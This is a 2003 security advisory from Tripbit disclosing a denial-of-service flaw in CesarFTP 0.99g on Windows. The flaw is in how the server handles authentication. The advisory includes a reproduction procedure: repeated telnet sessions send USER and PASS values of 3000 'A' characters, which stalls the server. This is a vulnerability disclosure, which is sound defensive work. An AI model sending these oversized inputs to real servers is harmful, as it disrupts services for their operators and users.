Tripbit Security Advisory | TA-250403 |
Severity:
|
Medium/High |
Application: |
CesarFTP Sever 0.99g |
Platform: |
Windows |
Class: |
Denial of Service |
Release
Date: |
April 25th, 2003 |
Vendor:
|
http://www.aclogic.com |
CesarFTP
a FTP server for Windows has problems with the authentification. When
the buffers of username and password are too big, it is vulnerable for
a Denial of Service Attack. |
First
FTP session C:\> ftp <host> <port> Connection with 80.146.140.248 was established. 220 CesarFTP 0.99g Server Welcome ! User (80.146.140.248:(none)): username Password: ****** ftp> First Telnet session C:\> telnet <host> <port> 220 CesarFTP 0.99g Server Welcome ! USER (3000 A's) PASS (3000 A's) Second telnet session C:\> telnet <host> <port> 220 CesarFTP 0.99g Server Welcome ! USER (3000 A's) PASS (3000 A's) Third telnet session C:\> telnet <host> <port> 220 CesarFTP 0.99g Server Welcome ! USER (3000 A's) PASS (3000 A's) Typing 'ls' now for example in the first ftp session won't do anything, because the server doesn't process the command. We may also open a second FTP session but won't be able to connect to the server. |
No
solution for the moment. |
The
vendor has been notified but no answer to this report. |
The
information within this paper may change without notice. Use of this information
constitutes acceptance for use in an 'AS IS' condition. There are 'NO'
warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is
at the user's own risk. |
This
vulnerability has been found and researched by: posidron posidron@tripbit.org rushjo rushjo@tripbit.org |
You
can find the latest version of this warning under the following URL: http://www.tripbit.org/advisories/TA-250403.html |